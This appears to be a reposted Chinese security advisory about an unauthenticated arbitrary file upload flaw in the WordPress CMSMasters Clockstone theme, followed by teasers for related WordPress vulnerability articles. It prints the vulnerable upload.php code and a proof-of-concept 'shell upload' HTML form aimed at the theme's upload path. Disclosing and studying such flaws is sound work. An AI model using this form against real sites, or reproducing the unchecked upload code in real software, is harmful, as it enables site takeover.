WordPress 多个CMSMasters主题'upload.php'任意文件上传漏洞

最新推荐文章于 2022-09-10 13:57:47 发布
最新推荐文章于 2022-09-10 13:57:47 发布
阅读量150 收藏
点赞数
文章标签: php shell
原文链接:http://www.cnblogs.com/security4399/archive/2012/12/27/2836478.html
版权
SSV-AppDir: WordPress漏洞
发布时间: 2012-12-19 (GMT+0800)
漏洞版本:
cmsmasters Clockstone
漏洞描述:
BUGTRAQ  ID: 56988
Clockstone是Wordpress的终极主题,一个单一的主题内集合了众多功能。
WordPress的Clockstone主题和其他主题存在文件上传漏洞。存在该漏洞的原因是由于问题代码对已登录的用户没有进行身份验证操作。攻击者可通过上传任意文件到受害者站点,进而获取站点的访问权限。

主题内有漏洞的代码:
<?php
   if ($_POST['url']){ $uploaddir = $_POST['url']; }
   $first_filename = $_FILES['uploadfile']['name'];
   $filename = md5($first_filename);
   $ext = substr($first_filename, 1 + strrpos($first_filename, '.'));
   $file = $uploaddir . basename($filename.'.'.$ext);
   if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $file)){
       echo basename($filename.'.'.$ext);
   } else {
       echo 'error';
   }
?>

 <* 参考

http://www.exploit-db.com/exploits/23494/
*>
测试方法:
程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 
Shell upload attack:<br />
   <form enctype="multipart/form-data" action="http://www.examplesite.com/wp-content/themes/clockstone/theme/functions/upload.php" method="post">
   <input type="text" name="url" value="./" /><br />
   Please choose a file: <input name="uploadfile" type="file" /><br />
   <input type="submit" value="Upload" />
   </form>
安全建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,建议您采取以下措施以降低威胁:

* 禁用CMSMasters主题

 

转载于:https://www.cnblogs.com/security4399/archive/2012/12/27/2836478.html

weixin_30407099
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
wordpress漏洞_Wordpress File-manager 任意文件上传漏洞复现
weixin_39960793的博客
12-12 1926
一、漏洞介绍软件及漏洞简介:wordpress File Manager插件 是最强悍和便利的WordPress文件管理插件,可以直接在WordPress后台管理你网站的所有文件,可以完全替代FTP,甚至功能要比FTP还要丰富,可以在线上传、下载、压缩、解压、查看、编辑文件等。WordPress插件WPFileManager中存在一个严重的0day安全漏洞,攻击者可以在安装了此插件的任何WordP...
wp-plugin-vulnerabilities:WordPress插件漏洞的集合
05-16
wp-plugin漏洞 WordPress插件漏洞的标准化集合。 用于此目的的数据已从WordPress.org存储库中的“”插件中提取,并以标准的YAML格式存储。 这些开发人员已为此YAML提供了所有原始源数据,我们所做的只是从PHP源代码中提取数据并将其存储在YAML中。 YAML结构的密钥是WordPress.org插件的子标签,可用于使用插件的目录名称轻松地识别已安装的插件(不幸的是,由于WordPress.org插件的性质,这种方法并不总是可靠的)。 我们将尽一切努力使它保持最新状态并与插件版本保持一致。 标签是从插件导入数据的日期,并查看它是“最新”的,将其与该插件的“最新更新”日期发布进行比较。 我想与原始开发人员合作,为此创建一个标准的数据存储,所以我还是朝着前进的方向迈进了-这毕竟是开源项目的目的。 为了帮助这个项目,请随时发出拉取请求等,我将在适当的时候考虑
uploadhandler.php,多个WordPress主题'upload-handler.php'任意文件上传漏洞
weixin_34175919的博客
03-26 107
发布日期:2013-11-17更新日期:2013-11-19受影响系统:WordPress WordPress描述:--------------------------------------------------------------------------------BUGTRAQ ID: 63768WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL ...
WordPress Kernel Theme ‘upload-handler.php任意文件上传漏洞
weixin_30399821的博客
11-12 215
漏洞名称: WordPress Kernel Theme ‘upload-handler.php任意文件上传漏洞 CNNVD编号: CNNVD-201311-127 发布时间: 2013-11-12 更新时间: 2013-11-12 危害等级: 漏洞类型: 代码注入 威胁类型: 远...
最新WordPress插件漏洞,影响超过700万个网站
w3cschools的博客
03-18 522
研究人员已经披露了多个WordPress插件中的漏洞,如果成功利用这些漏洞,则攻击者可以在某些情况下运行任意代码并接管网站。 这些缺陷已在Elementor(一个用于超过700万个网站的网站构建器插件)和WP Super Cache(用于服务WordPress网站的缓存页面的工具)中发现。 据国际知名白帽黑客、东方联盟创始人郭盛华透露:该错误与一组存储的跨站点脚本(XSS)漏洞(CVSS评分:6.4)有关,该漏洞是在将恶意脚本直接注入易受攻击的Web应用程序时发生的。 在这种情况下,由于在服务器端
WordPress配置文件wp-config.php详解
09-29
目录设置是关于WordPress中文件存储位置的自定义,比如上传的媒体文件、主题、插件等。在wp-config.php文件中可以指定这些目录的绝对路径,以避免在WordPress的设置中手动输入。此外,还可以通过添加特定的定义来...
基于PHPWordPress多梦主题-Bootstrap.zip
最新发布
07-23
这个主题旨在为WordPress网站提供一个响应式、功能丰富的设计,适合各种类型的网站,包括博客、商业站点或个人作品集。 【描述】中的"基于PHPWordPress多梦主题-Bootstrap.zip"表明该主题使用了PHP作为后端脚本...
wordpress 评论插件 wpDiscuz 任意文件上传漏洞分析1
08-03
WordPress wpDiscuz 评论插件任意文件上传漏洞分析】 WordPress 是一款广泛使用的开源内容管理系统,而 wpDiscuz 是一个流行的评论插件,它为 WordPress 网站提供了丰富的交互式评论功能。然而,如同任何软件一样...
允许 WordPress 上传任意文件的方法
09-29
针对这个问题,有两种方法可以解决,使得WordPress用户能够上传任意文件。 第一个方法是直接修改WordPress的核心配置文件wp-config.php,通过在该文件中添加一行代码:define('ALLOW_UNFILTERED_UPLOADS', true); ...
wordpress4.9漏洞
小小猪的博客
12-01 8167
漏洞介绍: WordPress可以说是当今最受欢迎的(我想说没有之一)基于PHP的开源CMS,其目前的全球用户高达数百万,并拥有超过4600万次的超高下载量。它是一个开源的系统,其次它的功能也十分强大。也正因为此,WordPress也成了众多黑客的攻击目标,一旦得手也就意味着数百万用户的沦陷。这种广泛的采用使其成为网络犯罪分子的一个有趣目标。这次实验的漏洞是在WordPress核心中的一个经过身份验证的任意文件删除漏洞CVE-2018-20714 该漏洞可能导致攻击者执行任意代码。该漏洞自发现到报告给W
wordpress 漏洞_WordPress漏洞分析
weixin_42514783的博客
01-26 5379
根据CVE官方漏洞通报得知wordpress新出一个组合式rce漏洞漏洞编号分别为CVE-2019-8943和CVE-2019-8942,下载漏洞版本源码,分析漏洞触发过程,注:漏洞复现时一定要断网搭建,wordpress在联网状态时会自动更新代码包。找到漏洞发生文件 post.phpwordpress多个post.php文件,这里简要说明一下各自的作用,wp-includes/post.p...
[代码审计]eyoucms前台未授权任意文件上传
weixin_30810583的博客
08-02 681
0x00 背景 来公司差不多一年了,然而我却依旧没有转正。约莫着转正也要到九月了,去年九月来的,实习,转正用了一年。2333 废话不多说了,最近有其他的事要忙,很久没有代码审计了。难的挖不了,浅的没意思。那就随便选吧。 在A5找了套源码,找找感觉。花了十来分钟审了一下,发现了个未授权任意文件上传。 0x01 总体了解 版本: v 1.1.3 框架: tp 5.0 目录...
wordpress 漏洞_轻松发现WordPress漏洞
culi4814的博客
08-24 1万+
wordpress 漏洞As a developer or design professional, one of the biggest benefits of building your sites on WordPress is that in most cases you are building your code on a proven platform which has been ...
php 图片上载 wordpress,WordPress后台中实现图片上传功能的实例讲解_PHP
weixin_39609670的博客
03-21 135
图片上传文件准备:新建php文件,我用默认主题Twenty Ten来测试,首先在这个主题的文件夹下新建一个文件-myfunctions.php 然后打开functions.php文件在最底部添加下面的代码载入我们新建的这个文件:include_once('myfunctions.php');类的代码如下:之后查看我们的后台设置页面,看一下我添加之后的效果图:此时文本域和上传按钮已经有了,但是点...
(CVE-2022-21661)WordPress SQL 注入漏洞分析和复现
weixin_50464560的博客
09-07 4892
转载https://www.freebuf.com/articles/web/321297.html。
最新2018年6月份Wordpress通杀全版本漏洞 详情及利用方法
网站安全专家
06-30 1万+
2018年6月29日,wordpress爆出最新漏洞,该网站漏洞通杀所有wordpress版本,包括目前的wordpress 4.8.6 以及wordpress 4.9.6版本。可以删除网站上的任意文件,影响危害严重,甚至是致命的一个漏洞,如果被攻击者利用,后果将不堪设想。截止目前该漏洞还未有被修复,如果您在使用wordpress,请尽快将wp-includes文件夹下的post.php文件改名,...
Wordpress漏洞复现
weixin_52194536的博客
09-10 8928
cms漏洞
Wordpress漏洞
热门推荐
Grey的博客
07-19 2万+
爆路径方法: 1.http://www.chouwazi.com/wp-admin/includes/admin.php   2.http://www.chouwazi.com/wp-content/plugins/akismet/akismet.php   3.http://www.chouwazi.com/wp-content/plugins/akismet/hello.php   4...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值